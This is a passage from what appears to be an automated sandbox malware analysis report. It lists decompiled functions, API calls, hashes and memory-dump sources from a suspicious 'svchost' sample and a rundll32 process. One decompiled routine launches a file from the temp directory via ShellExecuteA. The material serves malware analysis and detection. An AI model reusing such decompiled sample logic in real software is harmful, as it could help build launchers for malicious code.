                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                          • String ID: `W
                                                                          • API String ID: 730355536-2472242476
                                                                          • Opcode ID: ba61bbd837529c5ecebdd7207d7d116191595f71cea53c0003d39ae1a509e98c
                                                                          • Instruction ID: d2b02c823ba1647cc84e75737c235603f8a51179c48dc4d6faecaae88e00545b
                                                                          • Opcode Fuzzy Hash: ba61bbd837529c5ecebdd7207d7d116191595f71cea53c0003d39ae1a509e98c
                                                                          • Instruction Fuzzy Hash: B40184B02043406ED715AF699D0AB1A7BB5F745704F04847FA140BA2E1CBBE54B0CB5F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00406520, Relevance: 6.0, APIs: 4, Instructions: 38windowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00406520(void* __eax, struct HICON__* __edx) {
				void _v32;
				void* _v40;
				void* _v48;
				void* _v52;
				void* _t17;
				void* _t20;
				struct _ICONINFO* _t23;

				_t9 = __eax;
				_t20 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x1c))) {
					E004064E4(__eax);
					_t9 = __edx;
					 *((intOrPtr*)(_t20 + 0x1c)) = __edx;
					if(__edx != 0) {
						GetIconInfo(__edx, _t23);
						GetObjectA(_v40, 0x18,  &_v32);
						 *(_t20 + 0x18) = _v40;
						_t17 = _v52;
						if(_t17 != 0) {
							DeleteObject(_t17);
						}
						_t9 = _v48;
						if(_t9 != 0) {
							return DeleteObject(_t9);
						}
					}
				}
				return _t9;
			}










                                                                          0x00406520
                                                                          0x00406527
                                                                          0x0040652c
                                                                          0x00406530
                                                                          0x00406535
                                                                          0x00406537
                                                                          0x0040653c
                                                                          0x00406540
                                                                          0x00406551
                                                                          0x0040655a
                                                                          0x0040655d
                                                                          0x00406563
                                                                          0x00406566
                                                                          0x00406566
                                                                          0x0040656b
                                                                          0x00406571
                                                                          0x00000000
                                                                          0x00406574
                                                                          0x00406571
                                                                          0x0040653c
                                                                          0x0040657e

                                                                          APIs
                                                                            • Part of subcall function 004064E4: DestroyCursor.USER32(00000000), ref: 004064F3
                                                                          • GetIconInfo.USER32(?), ref: 00406540
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00406551
                                                                          • DeleteObject.GDI32(?), ref: 00406566
                                                                          • DeleteObject.GDI32(?), ref: 00406574
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Object$Delete$CursorDestroyIconInfo
                                                                          • String ID:
                                                                          • API String ID: 3133107492-0
                                                                          • Opcode ID: 57e2f9da13108c725cafe308d1a9a1f75ba6bb4e307d61bf9a431e00cd326d96
                                                                          • Instruction ID: 2ae9454a62f4479f67ab2556911db7116a2ee9a23fb28f719fd143bfb6d196f5
                                                                          • Opcode Fuzzy Hash: 57e2f9da13108c725cafe308d1a9a1f75ba6bb4e307d61bf9a431e00cd326d96
                                                                          • Instruction Fuzzy Hash: B9F06DB1A003117BCB00EE7AAC8594B72DC9F44750B02083EB940FB386E638DD6487E9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040FFB8, Relevance: 6.0, APIs: 4, Instructions: 38windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0040FF7C: DestroyCursor.USER32(00000000), ref: 0040FF8B
                                                                          • GetIconInfo.USER32(?), ref: 0040FFD8
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 0040FFE9
                                                                          • DeleteObject.GDI32(?), ref: 0040FFFE
                                                                          • DeleteObject.GDI32(?), ref: 0041000C
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Object$Delete$CursorDestroyIconInfo
                                                                          • String ID:
                                                                          • API String ID: 3133107492-0
                                                                          • Opcode ID: acb153883bb71467b8e7e04e19f1bbca08a1b42d08bc2ea88390571be6ea3eb5
                                                                          • Instruction ID: 2d28933f0b2e023a71d2f14a39f9032314a54afd7f494d7512fc5867bd48f6a1
                                                                          • Opcode Fuzzy Hash: acb153883bb71467b8e7e04e19f1bbca08a1b42d08bc2ea88390571be6ea3eb5
                                                                          • Instruction Fuzzy Hash: 67F06271A043155BCB14EEB99CC1A8B769C9F48754B00482AB850E7342E7B8DC8487E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040B90C, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0040B220: RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,Function_0000183E), ref: 0040B236
                                                                            • Part of subcall function 0040B220: RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,Function_0000183E), ref: 0040B249
                                                                            • Part of subcall function 0040B220: LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,Function_0000183E), ref: 0040B273
                                                                            • Part of subcall function 0040B220: RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,Function_0000183E), ref: 0040B2D0
                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,Function_00001FF0), ref: 0040B957
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,Function_00001FF7), ref: 0040BA82
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                          • String ID: `W
                                                                          • API String ID: 2227675388-2472242476
                                                                          • Opcode ID: c8d6f1cdc2855e01636b5ba2fddb86ec31b360b677cf824104232a0fc5f48131
                                                                          • Instruction ID: 0b4c2a8a148280f7eca9697b1b110deb553e61ee05e602a2dad4beec66924a59
                                                                          • Opcode Fuzzy Hash: c8d6f1cdc2855e01636b5ba2fddb86ec31b360b677cf824104232a0fc5f48131
                                                                          • Instruction Fuzzy Hash: 0F41BFB2A003019FD714CF29DD8162A77B0FB59314B29867ED581F73E1D739A8518B8E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004105E0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: DeleteIconInfoObject
                                                                          • String ID: ,k@
                                                                          • API String ID: 2689914137-1053005162
                                                                          • Opcode ID: 4f7ffccf5db40a083c410197de935c7d3ae98d988f7c9ffe2f672e957eb47bb6
                                                                          • Instruction ID: 6eb33a66848ac9ac3950d349fa1ce54abc8aaa9849f71adcceb630d577d3c1da
                                                                          • Opcode Fuzzy Hash: 4f7ffccf5db40a083c410197de935c7d3ae98d988f7c9ffe2f672e957eb47bb6
                                                                          • Instruction Fuzzy Hash: B7414C71E0021A9FDF10DF99C881AAEBBB4FF48318F11406AD911B7381D778AD95CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004078A6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 72%
                                                                          			E004078A6(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				char* _t39;
				void* _t40;
				void* _t46;
				intOrPtr _t57;
				void* _t61;

				_t60 = __esi;
				_t59 = __edi;
				_t46 = __ecx;
				_t45 = __ebx;
				E004049D0(0, __ebx, _t61 - 0xa244, __edi, __esi);
				E00404EEC(_t61 - 0xa240);
				SetCurrentDirectoryA(E0040340C( *((intOrPtr*)(_t61 - 0xa240))));
				_push(1);
				_push(0);
				E00406F34(1, __ebx, _t61 - 0xa248, __edi, __esi);
				_push(E0040340C( *((intOrPtr*)(_t61 - 0xa248))));
				E00405008(_t61 - 0xa250, _t45, _t46);
				E004031F4(_t61 - 0xa254, 9, 0x4091b4);
				E004049D0(0, _t45, _t61 - 0xa25c, _t59, _t60);
				E00404ED0( *((intOrPtr*)(_t61 - 0xa25c)), _t61 - 0xa258);
				E004032CC();
				_t39 = E0040340C( *((intOrPtr*)(_t61 - 0xa24c)));
				_t40 =  *0x40a650; // 0x400000
				ShellExecuteA(_t40, "open", _t39,  *(_t61 - 0xa258),  *(_t61 - 0xa254),  *(_t61 - 0xa250));
				_pop(_t57);
				 *[fs:eax] = _t57;
				_push(E00407993);
				return E004030B8(_t61 - 0xa25c, 0x14);
			}








                                                                          0x004078a6
                                                                          0x004078a6
                                                                          0x004078a6
                                                                          0x004078a6
                                                                          0x004078ae
                                                                          0x004078bf
                                                                          0x004078d0
                                                                          0x004078d5
                                                                          0x004078d7
                                                                          0x004078e1
                                                                          0x004078f1
                                                                          0x004078f8
                                                                          0x00407913
                                                                          0x00407926
                                                                          0x00407937
                                                                          0x0040794d
                                                                          0x00407958
                                                                          0x00407963
                                                                          0x00407969
                                                                          0x00407970
                                                                          0x00407973
                                                                          0x00407976
                                                                          0x0040798b

                                                                          APIs
                                                                            • Part of subcall function 004049D0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000,00404ADA,?,?,?,?,?,004070F9,00000000,00407126,?,00000000), ref: 00404A09
                                                                          • SetCurrentDirectoryA.KERNEL32(00000000), ref: 004078D0
                                                                            • Part of subcall function 00405008: GetTempPathA.KERNEL32(00000105,?,00000000,00405072,?,00000000), ref: 00405036
                                                                            • Part of subcall function 004049D0: GetCommandLineA.KERNEL32(00000000,00404ADA,?,?,?,?,?,004070F9,00000000,00407126,?,00000000,?,00408179,00000000,00408220), ref: 00404A23
                                                                          • ShellExecuteA.SHELL32(00400000,open,00000000,?,?,?), ref: 00407969
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CommandCurrentDirectoryExecuteFileLineModuleNamePathShellTemp
                                                                          • String ID: open
                                                                          • API String ID: 2622400689-2758837156
                                                                          • Opcode ID: fab5c3a15cb1cae7a61865492dfe33df0841a2aab3c5e5074238c8010eb0912a
                                                                          • Instruction ID: bc53e8da7d6e16968f2b3cdc64b9b09c5d4ffb8ac025ca0eed744acd73de400d
                                                                          • Opcode Fuzzy Hash: fab5c3a15cb1cae7a61865492dfe33df0841a2aab3c5e5074238c8010eb0912a
                                                                          • Instruction Fuzzy Hash: 83113070B107198ADB10FB79CC41A8DB779FF85308F0085F6B108BB192D67E9E858E5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0041133E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0040E468: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000,Function_00004ADA), ref: 0040E4A1
                                                                          • SetCurrentDirectoryA.KERNEL32(00000000), ref: 00411368
                                                                            • Part of subcall function 0040EAA0: GetTempPathA.KERNEL32(00000105,?,00000000,Function_00005072), ref: 0040EACE
                                                                            • Part of subcall function 0040E468: GetCommandLineA.KERNEL32(00000000,Function_00004ADA), ref: 0040E4BB
                                                                          • ShellExecuteA.SHELL32(00400000,open,00000000,?,?,?), ref: 00411401
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CommandCurrentDirectoryExecuteFileLineModuleNamePathShellTemp
                                                                          • String ID: open
                                                                          • API String ID: 2622400689-2758837156
                                                                          • Opcode ID: 3dfcb224a8b121a05150b7d78a53be97acece724c1d2c46a2dd075319d3e44da
                                                                          • Instruction ID: ca9bbc1aa8f47e6c3f9ee794e5cc2909a51f6400e8153674fcf191bbd04044bb
                                                                          • Opcode Fuzzy Hash: 3dfcb224a8b121a05150b7d78a53be97acece724c1d2c46a2dd075319d3e44da
                                                                          • Instruction Fuzzy Hash: D211ED70F043198EEB10FB79CC81A89B375EF86308F4049B6A008B7191D67E6E858E5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Analysis Process: rundll32.exe PID: 5384 Parent PID: 5184 rundll32.exeCOMMON

                                                                          Executed Functions

                                                                          Function 045B40D8, Relevance: 1.5, Strings: 1, Instructions: 239COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: `l
                                                                          • API String ID: 0-379310572
                                                                          • Opcode ID: 25e0e1613d2a5ca9237662001fb4aed1b2781c927bc90daf1beb2f93060e3545
                                                                          • Instruction ID: 48635cbed6b0e433e90d86c9578a476350f00735dfb7b6592cca2020d400b5d6
                                                                          • Opcode Fuzzy Hash: 25e0e1613d2a5ca9237662001fb4aed1b2781c927bc90daf1beb2f93060e3545
                                                                          • Instruction Fuzzy Hash: F691B230B10214DFDB349F64E8587AEBBB2FF85704F148529E4469B792DB34AC89DB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B3540, Relevance: .2, Instructions: 222COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 076e239bec5eefb527b9e9731266c29d23db00e046af83143c1dbf7a37d7d0fe
                                                                          • Instruction ID: 37a672c5d11d6086d69a5951cb38d75d3c25b03153bacbf0fa3db6b8f8637594
                                                                          • Opcode Fuzzy Hash: 076e239bec5eefb527b9e9731266c29d23db00e046af83143c1dbf7a37d7d0fe
                                                                          • Instruction Fuzzy Hash: 4B919D35A00615CFCB10EF64E895AAEB7B2FF88714B158569EC09AB350DF34ED05CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B1080, Relevance: .2, Instructions: 212COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 608296fd641980e943839dbda3362f2bc3f02a7b22bc28bc8d9e5c0f33742be3
                                                                          • Instruction ID: b42f633a02d06a7ab7f62e57a83ff8ca760643fbbe3ce6c2fc518cffa25c8e77
                                                                          • Opcode Fuzzy Hash: 608296fd641980e943839dbda3362f2bc3f02a7b22bc28bc8d9e5c0f33742be3
                                                                          • Instruction Fuzzy Hash: 0F71C435B01A189FDB149BB5C8646BEB7A7FFC8244F258029E506AB390DF34ED029791
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B4D20, Relevance: .2, Instructions: 207COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cb11c308e23e4b0ea79519ac5e5e7095f55ed4320a0029d0303d191987536d0c
                                                                          • Instruction ID: 087949fe8c839c1c20455593740d152fe2b93eb4a9ae2d282316e29a3696db61
                                                                          • Opcode Fuzzy Hash: cb11c308e23e4b0ea79519ac5e5e7095f55ed4320a0029d0303d191987536d0c
                                                                          • Instruction Fuzzy Hash: 74A11939A10615CFCB44DFA8D58488DBBB2FF89314721C65AE905AB329EB30ED49CF50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B4D30, Relevance: .2, Instructions: 200COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c86d80bb040e803cc6023eb5ef10858391a8e6ebc4fdf807c2e0209037f17b9a
                                                                          • Instruction ID: 9b61f3c219096b8007ce6e3e2f534b38aad10a47e50c0099ddb80caf2c264e5e
                                                                          • Opcode Fuzzy Hash: c86d80bb040e803cc6023eb5ef10858391a8e6ebc4fdf807c2e0209037f17b9a
                                                                          • Instruction Fuzzy Hash: 64910939A10619CFCB44DFA8D58489DB7B2FF88314721C65AE905AB329EB70ED49CF50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B3502, Relevance: .2, Instructions: 186COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ed7abdd0d72a1870457595e2d09604eac54fd9e357bbf1b1d218095d472659d8
                                                                          • Instruction ID: 416fce12254f7fc23aafa929118ea04021b2f2819c990c4b0223f08d598fa06c
                                                                          • Opcode Fuzzy Hash: ed7abdd0d72a1870457595e2d09604eac54fd9e357bbf1b1d218095d472659d8
                                                                          • Instruction Fuzzy Hash: FD61CE356012109FCB11EF34D891A9EBBA2EF89614B15819AEC06DF351DF34ED05CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B1630, Relevance: .2, Instructions: 158COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9c04576c8d6cdf4aabedabe3e5ed874440c12df1ef7ae9388ac0702c0f3fc4ad
                                                                          • Instruction ID: 9ac7d946814cd85649788ff4446ceabc6dabfa4a895371f2c378919c82090f44
                                                                          • Opcode Fuzzy Hash: 9c04576c8d6cdf4aabedabe3e5ed874440c12df1ef7ae9388ac0702c0f3fc4ad
                                                                          • Instruction Fuzzy Hash: AC51CD36B016089FCB15DF78D8506EEB7A6BFC9294B24812AD945DB354DB30EC02DBE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B0C1C, Relevance: .2, Instructions: 154COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1752909f54f20845c60023290afd58696efd5012a57c8a803f45fad3d70b59da
                                                                          • Instruction ID: 824813ff88ad45647c41bb0f207f11cf20003b003ab7e1e9550c10d40ea6cefe
                                                                          • Opcode Fuzzy Hash: 1752909f54f20845c60023290afd58696efd5012a57c8a803f45fad3d70b59da
                                                                          • Instruction Fuzzy Hash: 095105307052109FEB149B7594647FA3BB6EFC9318F14406AE445EB381CE399C06D7D1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B50B0, Relevance: .2, Instructions: 151COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fa0e8003b24901ea3cf16deb46cd6446eef32e9d032251b73b8327c5cc393286
                                                                          • Instruction ID: dfebca4d62909d142201b34816b5a2ba3c464b5d1a736f422aae0941a6f1c4f8
                                                                          • Opcode Fuzzy Hash: fa0e8003b24901ea3cf16deb46cd6446eef32e9d032251b73b8327c5cc393286
                                                                          • Instruction Fuzzy Hash: 27512330B156158FCB64DF68D891AAF7BE3BB89618710842AF945CB310EF30EC059BE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B50E0, Relevance: .1, Instructions: 143COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e83a2cbf70cbd9de50375dcbe3b7e90b6b1525d38cf73d68886c44e0084abe80
                                                                          • Instruction ID: c62a250975500cd383491d3d9fa6bce9c1c3ebc52e06b68f8a92900b8f4b8073
                                                                          • Opcode Fuzzy Hash: e83a2cbf70cbd9de50375dcbe3b7e90b6b1525d38cf73d68886c44e0084abe80
                                                                          • Instruction Fuzzy Hash: DD51A035B106258F8B64EF68D8516AFB7E3BB89618711842DF546CB314EF30EC059BD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B7378, Relevance: .1, Instructions: 139COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0d14d59394cb3508f0fb1ec613dd95330d8f3b6f4667ba8451b05015e7ac31f7
                                                                          • Instruction ID: 351446fd1a76b5ca60125802d26a88e585898bd366d7b4dd327b4b0c21072e91
                                                                          • Opcode Fuzzy Hash: 0d14d59394cb3508f0fb1ec613dd95330d8f3b6f4667ba8451b05015e7ac31f7
                                                                          • Instruction Fuzzy Hash: AC51A634600B018FC764DF29D494A66B7F2FF8D715B248A6CD59ACB6A0EB30F845DB84
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B3244, Relevance: .1, Instructions: 135COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7a50d5960fd8378be41ce86a64c8a7f3dafa801157e22b05b24dcfa93bccc891
                                                                          • Instruction ID: 633e1840660357b3bfb194f151634473179af771a1440ceae9caf437d873628f
                                                                          • Opcode Fuzzy Hash: 7a50d5960fd8378be41ce86a64c8a7f3dafa801157e22b05b24dcfa93bccc891
                                                                          • Instruction Fuzzy Hash: BC41F3317052555FDB149F74A8247BF7AAAFBC5208F14846EE846DB381EE38AC05A3E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B3217, Relevance: .1, Instructions: 112COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ac87df13b4506a8ee9281de3e92804df1b684cbd4f5008bb73f12aa783ba9315
                                                                          • Instruction ID: ba0d144183088d015a04781c77edb6e6e9038ec7e2e39be714ec813bbf974bcb
                                                                          • Opcode Fuzzy Hash: ac87df13b4506a8ee9281de3e92804df1b684cbd4f5008bb73f12aa783ba9315
                                                                          • Instruction Fuzzy Hash: 0D3124717092555FDB04DF64A8547FF3BA6FF85218F00446EE882DB291EB38A806E3A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B2268, Relevance: .1, Instructions: 106COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a0dfe44f42ba10d3ffdd7e270b0623855e0a0a7f0288e57194dad83ecd50ddad
                                                                          • Instruction ID: 3ab831589b2a2087166d4d40b1ce9491ac050e0c9ddb8eaab9ccbb267306322c
                                                                          • Opcode Fuzzy Hash: a0dfe44f42ba10d3ffdd7e270b0623855e0a0a7f0288e57194dad83ecd50ddad
                                                                          • Instruction Fuzzy Hash: 9D41F836B112149FCB54DF69D8849DEBBB1FF88314B10816AE905EB360DB31ED41DBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B3F60, Relevance: .1, Instructions: 94COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
